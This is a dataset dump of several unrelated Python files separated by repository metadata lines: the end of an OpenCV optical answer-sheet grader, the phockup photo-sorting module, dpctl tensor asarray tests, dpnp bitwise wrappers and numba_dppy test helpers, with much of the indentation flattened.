image=cv2.imread(bos_kagit)
gray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
kagit,kagit_gri=kagit_bul(image,gray)
bolgeler,areas=bolge_bul(kagit,kagit_gri)
'''
FIND SCHOOL NUMBER PART
'''
ogrno_bos=four_point_transform(kagit,bolgeler['ogrno'])
ogrno_bos_gri=four_point_transform(kagit_gri,bolgeler['ogrno'])
ogrno_coord,ogrno_thresh=contour_bul(ogrno_bos,ogrno_bos_gri)
contour_cizdir(ogrno_bos_gri,ogrno_coord,"ogrenci numarası")
#v2.imshow("ogrno",imutils.resize(ogrno_bos,height=400))
'''
DIVIDE ANSWER PART INTO 4 SLICES AND FIND ONE BY ONE
'''
cevap_bos=four_point_transform(kagit,bolgeler['cevaplar'])
cevap_bos_gri=four_point_transform(kagit_gri,bolgeler['cevaplar'])
col1,col2,col3,col4=cevap_kolon(cevap_bos)
col1_gri,col2_gri,col3_gri,col4_gri=cevap_gri(col1,col2,col3,col4)
col1_coord,col2_coord,col3_coord,col4_coord=cevap_contour(col1,col2,col3,col4)
#contour_cizdir(col1,col1_coord)
#cevap_islemleri(col2_gri,coord_cevap)
'''
EXAM TYPE FIND PART
'''
sinav_bos=four_point_transform(kagit,bolgeler['sinav_turu'])
sinav_bos_gri=four_point_transform(kagit_gri,bolgeler['sinav_turu'])
sinav_coord,sinav_thresh=contour_bul(sinav_bos,sinav_bos_gri)
sinav_islemleri(sinav_bos,sinav_bos_gri,sinav_coord)
#cv2.imshow("sınav türü",sinav_bos_gri)
'''
    OTHER REGIONS ON THE PAPER
'''
sorugrup_bos=four_point_transform(kagit,bolgeler['soru_grubu'])
sorugrup_bos_gri=four_point_transform(kagit_gri,bolgeler['soru_grubu'])
sorugrup_coord,sorugrup_thresh=contour_bul(sorugrup_bos,sorugrup_bos_gri,1)
coors=soru_grup_contour_bul(sorugrup_bos,sorugrup_bos_gri)
soru_cont,soru_thr=contour_bul(sorugrup_bos,sorugrup_bos_gri,1)
###############################
ogretim_bos=four_point_transform(kagit,bolgeler['ogretim_onay'])
ogretim_bos_gri=four_point_transform(kagit_gri,bolgeler['ogretim_onay'])
ogret_cont,ogret_thr=contour_bul(ogretim_bos,ogretim_bos_gri,1)
'''
    NAME DETECTION PART
'''
isim_bos=four_point_transform(kagit,bolgeler['isim'])
isim_bos_gri=cv2.cvtColor(isim_bos,cv2.COLOR_BGR2GRAY)
coord_isim, thres=contour_bul(isim_bos, isim_bos_gri)
#contour_cizdir(isim_bos,coord,"isim_bos")
#cevap_islemleri(cevap_bos_gri,coord)
##############################################
resim=cv2.imread(dolu_kagit)
resim_gri=cv2.cvtColor(resim,cv2.COLOR_BGR2GRAY)
warp2,warp2_gri=kagit_bul(resim,resim_gri)
bolgeler2,areas2=bolge_bul(warp2,warp2_gri)
ret,warp2=ters_bul(warp2,areas2)
'''
    IF THE SHEET WAS UPSIDE DOWN, FIND THE REGIONS AGAIN
'''
if ret==True:
warp2_gri=cv2.cvtColor(warp2,cv2.COLOR_BGR2GRAY)
bolgeler2,areas2=bolge_bul(warp2,warp2_gri)
else:
pass
isim_dolu=four_point_transform(warp2,bolgeler2['isim'])
isim_dolu_gri=cv2.cvtColor(isim_dolu,cv2.COLOR_BGR2GRAY)
contour_cizdir(isim_dolu,coord_isim,"dolu_kagit_contourlu")
'''
    INSTRUCTOR APPROVAL REGION ON THE FILLED SHEET
'''
ogretim_dolu=four_point_transform(warp2,bolgeler2['ogretim_onay'])
ogretim_dolu_gri=cv2.cvtColor(ogretim_dolu,cv2.COLOR_BGR2GRAY)
ogret_onay=sorugrup_islemleri(ogretim_dolu,ogretim_dolu_gri,ogret_cont)
print("Öğretim Onayı:",ogret_onay)
#cv2.drawContours(ogretim_dolu,ogret_cont,-1,(255,0,0),thickness=3)
#cv2.imshow("ogretc",ogretim_dolu)
#ogretim_onayı=sorugrup_islemleri(ogretim_dolu,ogretim_dolu_gri,ogretimonay_coord)
sorugrup_dolu=four_point_transform(warp2,bolgeler2['soru_grubu'])
sorugrup_dolu_gri=cv2.cvtColor(sorugrup_dolu,cv2.COLOR_BGR2GRAY)
soru_tur=sorugrup_islemleri(sorugrup_dolu,sorugrup_dolu_gri,soru_cont)
print("Soru Grubu",soru_tur)
thresh_dolu=cv2.threshold(isim_dolu_gri,0,255,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)[1]
isim_str=isim_islemleri(isim_dolu_gri,coord_isim,thresh_dolu)
print(isim_str)
sinav_dolu=four_point_transform(warp2,bolgeler2['sinav_turu'])
sinav_dolu_gri=cv2.cvtColor(sinav_dolu,cv2.COLOR_BGR2GRAY)
sinav_turu=sinav_islemleri(sinav_dolu,sinav_dolu_gri,sinav_coord)
print("Sınav Türü: ",sinav_turu)
ogrno_dolu=four_point_transform(warp2,bolgeler2['ogrno'])
ogrno_dolu_gri=cv2.cvtColor(ogrno_dolu,cv2.COLOR_BGR2GRAY)
ogrno_islemleri(ogrno_dolu,ogrno_dolu_gri,ogrno_coord)
cevap_dolu=four_point_transform(warp2,bolgeler2['cevaplar'])
cevap_dolu_gri=cv2.cvtColor(cevap_dolu,cv2.COLOR_BGR2GRAY)
col1_dolu,col2_dolu,col3_dolu,col4_dolu=cevap_kolon(cevap_dolu)
col1_gri_dolu,col2_gri_dolu,col3_gri_dolu,col4_gri_dolu=cevap_gri(col1_dolu,col2_dolu,col3_dolu,col4_dolu)
#contour_cizdir(col1_dolu,col1_coord,"colon1 dolu")
if len(cevap_anahtar)<=30:
basarim=cevap_islemleri(col1_gri_dolu,col1_coord,1)
elif len(cevap_anahtar)<=60:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim=(basarim1[0]+basarim2[0],basarim1[1]+basarim2[1],basarim1[2]+basarim2[2],basarim1[3]+basarim2[3])
#print(basarim)
elif len(cevap_anahtar)<=90:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim3=cevap_islemleri(col3_gri_dolu,col3_coord,3)
        basarim=tuple(map(sum, zip(basarim1, basarim2, basarim3)))  # element-wise totals, not tuple concatenation
elif len(cevap_anahtar)<=120:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim3=cevap_islemleri(col3_gri_dolu,col3_coord,3)
basarim4=cevap_islemleri(col4_gri_dolu,col4_coord,4)
        basarim=tuple(map(sum, zip(basarim1, basarim2, basarim3, basarim4)))  # element-wise totals, not tuple concatenation
print(f"Doğru cevap sayısı:{basarim[0]}\nYanlış cevap sayısı:{basarim[1]}\nBoş sayısı:{basarim[2]}\nİki cevap işaret:{basarim[3]}")
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == '__main__':
bos_kagit="optic_empty.jpg"
dolu_kagit="optic_marked.jpg"
main_starter(bos_kagit,dolu_kagit)
``` |
{
"source": "1enn0/phockup",
"score": 3
} |
#### File: phockup/src/phockup.py
```python
import hashlib
import os
import re
import shutil
import sys
from src.date import Date
from src.exif import Exif
from src.printer import Printer
from src.logger import Logger
printer = Printer()
logger = Logger()
ignored_files = (
".DS_Store",
"Thumbs.db",
"ZbThumbnail.info",
)
class Phockup():
def __init__(self, input, output, **args):
input = os.path.expanduser(input)
output = os.path.expanduser(output)
if input.endswith(os.path.sep):
input = input[:-1]
if output.endswith(os.path.sep):
output = output[:-1]
self.input = input
self.output = output
self.dir_format = args.get('dir_format', os.path.sep.join(['%Y', '%m', '%d']))
self.move = args.get('move', False)
self.link = args.get('link', False)
self.original_filenames = args.get('original_filenames', False)
self.date_regex = args.get('date_regex', None)
self.timestamp = args.get('timestamp', False)
self.output_log = args.get('output_log', False)
self.path_root = args.get('path_root', '')
self.date_field = args.get('date_field', False)
self.dry_run = args.get('dry_run', False)
self.check_directories()
self.walk_directory()
if self.output_log:
log_name = os.path.split(self.input)[1] + '.pickle'
printer.line(f'Saving log to {log_name}')
logger.save_to_disk(os.path.join(self.output, log_name))
def check_directories(self):
"""
Check if input and output directories exist.
If input does not exists it exits the process
If output does not exists it tries to create it or exit with error
"""
if not os.path.isdir(self.input) or not os.path.exists(self.input):
printer.error('Input directory "%s" does not exist or cannot be accessed' % self.input)
return
if not os.path.exists(self.output):
printer.line('Output directory "%s" does not exist, creating now' % self.output)
try:
if not self.dry_run:
os.makedirs(self.output)
except Exception:
printer.error('Cannot create output directory. No write access!')
def walk_directory(self):
"""
Walk input directory recursively and call process_file for each file except the ignored ones
"""
for root, _, files in os.walk(self.input):
files.sort()
for filename in files:
if filename in ignored_files:
checksum = self.checksum(os.path.join(root, filename))
logger.add_entry(checksum, os.path.join(root, filename), '', Logger.ACTION_IGNORE)
continue
file = os.path.join(root, filename)
self.process_file(file)
def checksum(self, file):
"""
Calculate checksum for a file.
Used to match if duplicated file name is actually a duplicated file
"""
block_size = 65536
sha256 = hashlib.sha256()
with open(file, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def is_image_or_video(self, mimetype):
"""
Use mimetype to determine if the file is an image or video
"""
pattern = re.compile('^(image/.+|video/.+|application/vnd.adobe.photoshop)$')
if pattern.match(mimetype):
return True
return False
def get_output_dir(self, date, file):
"""
Generate output directory path based on the extracted date and formatted using dir_format
If date is missing from the exifdata the file is going to "unknown" directory
unless user included a regex from filename or uses timestamp
"""
toplevel = 'archive'
        if date and not date['guessing']:
            try:
                path = [self.output, toplevel, date['date'].date().strftime(self.dir_format)]
            except Exception:
                path = None
        else:
            path = None
        if path is None:
            # date is missing or could only be guessed: keep the path relative
            # to the source root dir, e.g.
            # root_dir/rel/path/bla.pdf ==> dst_dir/unknown/rel/path/bla.pdf
            repl = self.path_root if self.path_root else self.input
            if not repl.endswith(os.path.sep):
                repl = repl + os.path.sep
            rel_path_from_root = os.path.dirname(os.path.abspath(file)).replace(repl, '')
            path = [self.output, 'unknown', rel_path_from_root]
fullpath = os.path.sep.join(path)
if not os.path.isdir(fullpath) and not self.dry_run:
os.makedirs(fullpath)
return fullpath
def get_file_name(self, file, date):
"""
Generate file name based on exif data unless it is missing or
original filenames are required. Then use original file name
"""
if self.original_filenames:
return os.path.basename(file)
try:
filename = [
'%04d' % date['date'].year,
'%02d' % date['date'].month,
'%02d' % date['date'].day,
'_',
'%02d' % date['date'].hour,
'%02d' % date['date'].minute,
'%02d' % date['date'].second,
]
if date['subseconds']:
filename.append(date['subseconds'])
return ''.join(filename) + os.path.splitext(file)[1]
except:
return os.path.basename(file)
def process_file(self, file):
"""
Process the file using the selected strategy
If file is .xmp skip it so process_xmp method can handle it
"""
if str.endswith(file, '.xmp'):
return None
printer.line(file, True)
output, target_file_name, target_file_path = self.get_file_name_and_path(file)
suffix = 1
target_file = target_file_path
if self.output_log:
checksum = self.checksum(file)
else:
checksum = ''
while True:
if os.path.isfile(target_file):
if not self.output_log:
checksum = self.checksum(file)
if checksum == self.checksum(target_file):
logger.add_entry(checksum, file, target_file, Logger.ACTION_SKIP)
printer.line(' => skipped, duplicated file %s' % target_file)
break
else:
if self.move and not self.dry_run:
try:
shutil.move(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_MOVE)
except FileNotFoundError:
printer.line(' => skipped, no such file or directory')
break
elif self.link and not self.dry_run:
os.link(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_LINK)
elif not self.dry_run:
try:
shutil.copy2(file, target_file)
logger.add_entry(checksum, file, target_file, Logger.ACTION_COPY)
except FileNotFoundError:
printer.line(' => skipped, no such file or directory')
break
printer.line(' => %s' % target_file)
self.process_xmp(file, target_file_name, suffix, output)
break
suffix += 1
target_split = os.path.splitext(target_file_path)
target_file = "%s-%d%s" % (target_split[0], suffix, target_split[1])
def get_file_name_and_path(self, file):
"""
Returns target file name and path
"""
exif_data = Exif(file).data()
if exif_data and 'MIMEType' in exif_data and self.is_image_or_video(exif_data['MIMEType']):
date = Date(file).from_exif(exif_data, self.timestamp, self.date_regex, self.date_field)
output = self.get_output_dir(date, file)
            target_file_name = self.get_file_name(file, date)
            if not self.original_filenames:
                target_file_name = target_file_name.lower()
target_file_path = os.path.sep.join([output, target_file_name])
else:
output = self.get_output_dir(False, file)
target_file_name = os.path.basename(file)
target_file_path = os.path.sep.join([output, target_file_name])
return output, target_file_name, target_file_path
def process_xmp(self, file, file_name, suffix, output):
"""
Process xmp files. These are meta data for RAW images
"""
xmp_original_with_ext = file + '.xmp'
xmp_original_without_ext = os.path.splitext(file)[0] + '.xmp'
suffix = '-%s' % suffix if suffix > 1 else ''
if os.path.isfile(xmp_original_with_ext):
xmp_original = xmp_original_with_ext
xmp_target = '%s%s.xmp' % (file_name, suffix)
elif os.path.isfile(xmp_original_without_ext):
xmp_original = xmp_original_without_ext
xmp_target = '%s%s.xmp' % (os.path.splitext(file_name)[0], suffix)
else:
xmp_original = None
xmp_target = None
if xmp_original:
xmp_path = os.path.sep.join([output, xmp_target])
printer.line('%s => %s' % (xmp_original, xmp_path))
if not self.dry_run:
if self.move:
shutil.move(xmp_original, xmp_path)
elif self.link:
os.link(xmp_original, xmp_path)
else:
shutil.copy2(xmp_original, xmp_path)
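
# A minimal usage sketch (paths and options below are illustrative, not from
# the project docs). Instantiating Phockup immediately checks the directories
# and walks the input tree, so this one call performs the whole sort:
#
#     Phockup('~/incoming', '~/sorted',
#             dir_format=os.path.sep.join(['%Y', '%m', '%d']),
#             move=False)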
``` |
{
"source": "1e-to/dpctl",
"score": 2
} |
#### File: dpctl/tests/test_tensor_asarray.py
```python
import numpy as np
import pytest
import dpctl
import dpctl.tensor as dpt
@pytest.mark.parametrize(
"src_usm_type, dst_usm_type",
[
("device", "shared"),
("device", "host"),
("shared", "device"),
("shared", "host"),
("host", "device"),
("host", "shared"),
],
)
def test_asarray_change_usm_type(src_usm_type, dst_usm_type):
d = dpctl.SyclDevice()
if d.is_host:
pytest.skip(
"Skip test of host device, which only "
"supports host USM allocations"
)
X = dpt.empty(10, dtype="u1", usm_type=src_usm_type)
Y = dpt.asarray(X, usm_type=dst_usm_type)
assert X.shape == Y.shape
assert X.usm_type == src_usm_type
assert Y.usm_type == dst_usm_type
with pytest.raises(ValueError):
# zero copy is not possible
dpt.asarray(X, usm_type=dst_usm_type, copy=False)
Y = dpt.asarray(X, usm_type=dst_usm_type, sycl_queue=X.sycl_queue)
assert X.shape == Y.shape
assert Y.usm_type == dst_usm_type
Y = dpt.asarray(
X,
usm_type=dst_usm_type,
sycl_queue=X.sycl_queue,
device=d.get_filter_string(),
)
assert X.shape == Y.shape
assert Y.usm_type == dst_usm_type
def test_asarray_from_numpy():
Xnp = np.arange(10)
Y = dpt.asarray(Xnp, usm_type="device")
assert type(Y) is dpt.usm_ndarray
assert Y.shape == (10,)
assert Y.dtype == Xnp.dtype
def test_asarray_from_sequence():
X = [1, 2, 3]
Y = dpt.asarray(X, usm_type="device")
assert type(Y) is dpt.usm_ndarray
X = [(1, 1), (2.0, 2.0 + 1.0j), range(4, 6), np.array([3, 4], dtype="c16")]
Y = dpt.asarray(X, usm_type="device")
assert type(Y) is dpt.usm_ndarray
assert Y.ndim == 2
def test_asarray_from_object_with_suai():
"""Test that asarray can deal with opaque objects implementing SUAI"""
class Dummy:
def __init__(self, obj, iface):
self.obj = obj
self.__sycl_usm_array_interface__ = iface
X = dpt.empty((2, 3, 4), dtype="f4")
Y = dpt.asarray(Dummy(X, X.__sycl_usm_array_interface__))
assert Y.shape == X.shape
assert X.usm_type == Y.usm_type
assert X.dtype == Y.dtype
assert X.sycl_device == Y.sycl_device
def test_asarray_input_validation():
with pytest.raises(TypeError):
# copy keyword is not of right type
dpt.asarray([1], copy="invalid")
with pytest.raises(TypeError):
# order keyword is not valid
dpt.asarray([1], order=1)
with pytest.raises(TypeError):
# dtype is not valid
dpt.asarray([1], dtype="invalid")
with pytest.raises(ValueError):
# unexpected value of order
dpt.asarray([1], order="Z")
with pytest.raises(TypeError):
# usm_type is of wrong type
dpt.asarray([1], usm_type=dict())
with pytest.raises(ValueError):
# usm_type has wrong value
dpt.asarray([1], usm_type="mistake")
with pytest.raises(TypeError):
# sycl_queue type is not right
dpt.asarray([1], sycl_queue=dpctl.SyclContext())
with pytest.raises(ValueError):
# sequence is not rectangular
dpt.asarray([[1], 2])
def test_asarray_input_validation2():
d = dpctl.get_devices()
if len(d) < 2:
pytest.skip("Not enough SYCL devices available")
d0, d1 = d[:2]
try:
q0 = dpctl.SyclQueue(d0)
except dpctl.SyclQueueCreationError:
pytest.skip(f"SyclQueue could not be created for {d0}")
try:
q1 = dpctl.SyclQueue(d1)
except dpctl.SyclQueueCreationError:
pytest.skip(f"SyclQueue could not be created for {d1}")
with pytest.raises(TypeError):
dpt.asarray([1, 2], sycl_queue=q0, device=q1)
def test_asarray_scalars():
import ctypes
Y = dpt.asarray(5)
assert Y.dtype == np.dtype(int)
Y = dpt.asarray(5.2)
assert Y.dtype == np.dtype(float)
Y = dpt.asarray(np.float32(2.3))
assert Y.dtype == np.dtype(np.float32)
Y = dpt.asarray(1.0j)
assert Y.dtype == np.dtype(complex)
Y = dpt.asarray(ctypes.c_int(8))
assert Y.dtype == np.dtype(ctypes.c_int)
def test_asarray_copy_false():
try:
q = dpctl.SyclQueue()
except dpctl.SyclQueueCreationError:
pytest.skip("Could not create a queue")
X = dpt.from_numpy(np.random.randn(10, 4), usm_type="device", sycl_queue=q)
Y1 = dpt.asarray(X, copy=False, order="K")
assert Y1 is X
Y1c = dpt.asarray(X, copy=True, order="K")
assert not (Y1c is X)
Y2 = dpt.asarray(X, copy=False, order="C")
assert Y2 is X
Y3 = dpt.asarray(X, copy=False, order="A")
assert Y3 is X
with pytest.raises(ValueError):
Y1 = dpt.asarray(X, copy=False, order="F")
Xf = dpt.empty(
X.shape,
dtype=X.dtype,
usm_type="device",
sycl_queue=X.sycl_queue,
order="F",
)
Xf[:] = X
Y4 = dpt.asarray(Xf, copy=False, order="K")
assert Y4 is Xf
Y5 = dpt.asarray(Xf, copy=False, order="F")
assert Y5 is Xf
Y6 = dpt.asarray(Xf, copy=False, order="A")
assert Y6 is Xf
with pytest.raises(ValueError):
dpt.asarray(Xf, copy=False, order="C")
``` |
{
"source": "1e-to/dpnp",
"score": 2
} |
#### File: dpnp/dpnp/dpnp_iface_bitwise.py
```python
import numpy
from dpnp.dpnp_algo import *
from dpnp.dparray import dparray
from dpnp.dpnp_utils import *
import dpnp
__all__ = [
'bitwise_and',
'bitwise_or',
'bitwise_xor',
'invert',
'bitwise_not',
'left_shift',
'right_shift',
]
def _check_nd_call(origin_func, dpnp_func, *input_arrays,
check_sizes=False, check_shapes=False, check_dtypes=False, **kwargs):
"""
    Choose which function to call based on the input arrays' types, data types
    and shapes, then call the chosen function.
Parameters
----------
origin_func : function
original function to call if at least one input array didn't meet the requirements
dpnp_func : function
dpnp function to call if all the input arrays met the requirements
input_arrays : tuple(arrays)
input arrays
check_sizes : bool
to check all input arrays sizes are equal
check_shapes : bool
to check all input arrays shapes are equal
check_dtypes : bool
to check all input arrays data types are equal
kwargs : dict
remaining input parameters of the function
Returns
-------
result of the function call
"""
x1, *_ = input_arrays
if not use_origin_backend(x1) and not kwargs:
for x in input_arrays:
if not isinstance(x, dparray):
break
else:
if check_sizes and len(set(x.size for x in input_arrays)) > 1:
pass # fallback to numpy in case of different sizes of input arrays
elif check_shapes and len(set(x.shape for x in input_arrays)) > 1:
pass # fallback to numpy in case of different shapes of input arrays
elif check_dtypes and len(set(x.dtype for x in input_arrays)) > 1:
pass # fallback to numpy in case of different dtypes of input arrays
else:
return dpnp_func(*input_arrays)
return call_origin(origin_func, *input_arrays, **kwargs)
def bitwise_and(x1, x2, **kwargs):
"""
Compute the bit-wise AND of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_and`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.logical_and` : Compute the truth value of ``x1`` AND ``x2`` element-wise.
:obj:`dpnp.bitwise_or`: Compute the bit-wise OR of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([2, 5, 255])
>>> x2 = np.array([3,14,16])
>>> out = np.bitwise_and(x1, x2)
>>> [i for i in out]
[2, 4, 16]
"""
return _check_nd_call(numpy.bitwise_and, dpnp_bitwise_and, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def bitwise_or(x1, x2, **kwargs):
"""
Compute the bit-wise OR of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_or`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.logical_or` : Compute the truth value of ``x1`` OR ``x2`` element-wise.
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([2, 5, 255])
>>> x2 = np.array([4, 4, 4])
>>> out = np.bitwise_or(x1, x2)
>>> [i for i in out]
[6, 5, 255]
"""
return _check_nd_call(numpy.bitwise_or, dpnp_bitwise_or, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def bitwise_xor(x1, x2, **kwargs):
"""
Compute the bit-wise XOR of two arrays element-wise.
For full documentation refer to :obj:`numpy.bitwise_xor`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
    :obj:`dpnp.logical_xor` : Compute the truth value of ``x1`` XOR ``x2`` element-wise.
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_or` : Compute the bit-wise OR of two arrays element-wise.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([31, 3])
>>> x2 = np.array([5, 6])
>>> out = np.bitwise_xor(x1, x2)
>>> [i for i in out]
[26, 5]
"""
return _check_nd_call(numpy.bitwise_xor, dpnp_bitwise_xor, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def invert(x, **kwargs):
"""
Compute bit-wise inversion, or bit-wise NOT, element-wise.
For full documentation refer to :obj:`numpy.invert`.
Limitations
-----------
Parameters ``x`` is supported as :obj:`dpnp.ndarray`.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input array ``x`` is supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.bitwise_and`: Compute the bit-wise AND of two arrays element-wise.
:obj:`dpnp.bitwise_or` : Compute the bit-wise OR of two arrays element-wise.
:obj:`dpnp.bitwise_xor` : Compute the bit-wise XOR of two arrays element-wise.
:obj:`dpnp.logical_not` : Compute the truth value of NOT x element-wise.
Examples
--------
>>> import dpnp as np
>>> x = np.array([13])
>>> out = np.invert(x)
>>> out[0]
-14
"""
return _check_nd_call(numpy.invert, dpnp_invert, x, **kwargs)
bitwise_not = invert # bitwise_not is an alias for invert
def left_shift(x1, x2, **kwargs):
"""
Shift the bits of an integer to the left.
For full documentation refer to :obj:`numpy.left_shift`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.right_shift` : Shift the bits of an integer to the right.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([5, 5, 5])
>>> x2 = np.array([1, 2, 3])
>>> out = np.left_shift(x1, x2)
>>> [i for i in out]
[10, 20, 40]
"""
return _check_nd_call(numpy.left_shift, dpnp_left_shift, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
def right_shift(x1, x2, **kwargs):
"""
Shift the bits of an integer to the right.
For full documentation refer to :obj:`numpy.right_shift`.
Limitations
-----------
Parameters ``x1`` and ``x2`` are supported as :obj:`dpnp.ndarray`.
Sizes, shapes and data types of input arrays ``x1`` and ``x2`` are supported to be equal.
Keyword arguments ``kwargs`` are currently unsupported.
Otherwise the function will be executed sequentially on CPU.
Input arrays ``x1`` and ``x2`` are supported as integer :obj:`dpnp.ndarray` only.
See Also
--------
:obj:`dpnp.left_shift` : Shift the bits of an integer to the left.
Examples
--------
>>> import dpnp as np
>>> x1 = np.array([10, 10, 10])
>>> x2 = np.array([1, 2, 3])
>>> out = np.right_shift(x1, x2)
>>> [i for i in out]
[5, 2, 1]
"""
return _check_nd_call(numpy.right_shift, dpnp_right_shift, x1, x2,
check_sizes=True, check_shapes=True, check_dtypes=True, **kwargs)
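# Illustrative note: for non-negative integers these shifts amount to scaling
# by powers of two, i.e. left_shift(x, n) == x * 2**n and
# right_shift(x, n) == x // 2**n, which is why the examples above read as
# 5 * 2**[1, 2, 3] -> [10, 20, 40] and 10 // 2**[1, 2, 3] -> [5, 2, 1].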
``` |
{
"source": "1e-to/numba-dppy",
"score": 2
} |
#### File: numba_dppy/tests/_helper.py
```python
import contextlib
import dpctl
import pytest
from numba.tests.support import captured_stdout
from numba_dppy import config
def has_opencl_gpu():
"""
Checks if dpctl is able to select an OpenCL GPU device.
"""
return bool(dpctl.get_num_devices(backend="opencl", device_type="gpu"))
def has_opencl_cpu():
"""
Checks if dpctl is able to select an OpenCL CPU device.
"""
return bool(dpctl.get_num_devices(backend="opencl", device_type="cpu"))
def has_level_zero():
"""
Checks if dpctl is able to select a Level Zero GPU device.
"""
return bool(dpctl.get_num_devices(backend="level_zero", device_type="gpu"))
def has_sycl_platforms():
"""
Checks if dpctl is able to identify a non-host SYCL platform.
"""
platforms = dpctl.get_platforms()
for p in platforms:
if p.backend is not dpctl.backend_type.host:
return True
return False
def is_gen12(device_type):
with dpctl.device_context(device_type):
q = dpctl.get_current_queue()
device = q.get_sycl_device()
name = device.name
if "Gen12" in name:
return True
return False
def platform_not_supported(device_type):
import platform
system = platform.system()
device = device_type.split(":")[0]
if device == "level_zero" and system == "Windows":
return True
return False
def skip_test(device_type):
skip = False
try:
with dpctl.device_context(device_type):
pass
except Exception:
skip = True
if not skip:
if platform_not_supported(device_type):
skip = True
return skip
skip_no_opencl_gpu = pytest.mark.skipif(
not has_opencl_gpu(),
reason="No opencl GPU platforms available",
)
skip_no_opencl_cpu = pytest.mark.skipif(
not has_opencl_cpu(),
reason="No opencl CPU platforms available",
)
skip_no_level_zero_gpu = pytest.mark.skipif(
not has_level_zero(),
reason="No level-zero GPU platforms available",
)
filter_strings = [
pytest.param("level_zero:gpu:0", marks=skip_no_level_zero_gpu),
pytest.param("opencl:gpu:0", marks=skip_no_opencl_gpu),
pytest.param("opencl:cpu:0", marks=skip_no_opencl_cpu),
]
@contextlib.contextmanager
def override_config(name, value, config=config):
"""
Extends `numba/tests/support.py:override_config()` with argument `config`
which is `numba_dppy.config` by default.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
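# Hypothetical usage sketch (the function under test is illustrative):
# temporarily flip a numba_dppy config flag for the duration of a test.
#
#     with override_config("DEBUG", 1):
#         run_jitted_function_under_test()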
def _id(obj):
return obj
def ensure_dpnp():
try:
from numba_dppy.dpnp_iface import dpnp_fptr_interface as dpnp_iface
return True
except Exception:
return False
@contextlib.contextmanager
def dpnp_debug():
import numba_dppy.dpnp_iface as dpnp_lowering
old, dpnp_lowering.DEBUG = dpnp_lowering.DEBUG, 1
yield
dpnp_lowering.DEBUG = old
@contextlib.contextmanager
def assert_dpnp_implementaion():
from numba.tests.support import captured_stdout
with captured_stdout() as stdout, dpnp_debug():
yield
assert (
"dpnp implementation" in stdout.getvalue()
), "dpnp implementation is not used"
@contextlib.contextmanager
def assert_auto_offloading(parfor_offloaded=1, parfor_offloaded_failure=0):
"""
If ``parfor_offloaded`` is not provided, this context manager
checks for one occurrence of the success message. Developers
can always specify how many parfor offload success messages
are expected.
If ``parfor_offloaded_failure`` is not provided, the default
behavior is to expect zero failure messages; in other words, we
expect all parfors present in the code to be successfully
offloaded to the GPU.
"""
old_debug = config.DEBUG
config.DEBUG = 1
with captured_stdout() as stdout:
yield
config.DEBUG = old_debug
got_parfor_offloaded = stdout.getvalue().count("Parfor offloaded to")
assert parfor_offloaded == got_parfor_offloaded, (
"Expected %d parfor(s) to be auto offloaded, instead got %d parfor(s) auto offloaded"
% (parfor_offloaded, got_parfor_offloaded)
)
got_parfor_offloaded_failure = stdout.getvalue().count(
"Failed to offload parfor to"
)
assert parfor_offloaded_failure == got_parfor_offloaded_failure, (
"Expected %d parfor(s) to be not auto offloaded, instead got %d parfor(s) not auto offloaded"
% (parfor_offloaded_failure, got_parfor_offloaded_failure)
)
